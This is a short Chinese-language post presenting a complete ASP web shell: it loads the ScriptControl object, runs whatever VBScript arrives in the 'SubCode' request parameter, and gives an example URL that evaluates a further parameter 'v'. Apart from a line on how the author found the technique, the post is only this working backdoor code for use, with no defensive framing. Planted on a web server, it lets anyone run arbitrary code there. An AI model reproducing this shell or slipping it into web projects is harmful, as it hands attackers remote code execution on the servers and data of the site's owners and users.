简单的ASP后门服务端实现代码
今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来和lcx讨论了下。得到了如下代码:<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) 参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error 参数名e 调用之,同时压入6个基对象作为参数
调用示例:
http://localhost/tmp.asp?SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
%>
补充:Web开发 , ASP.Net ,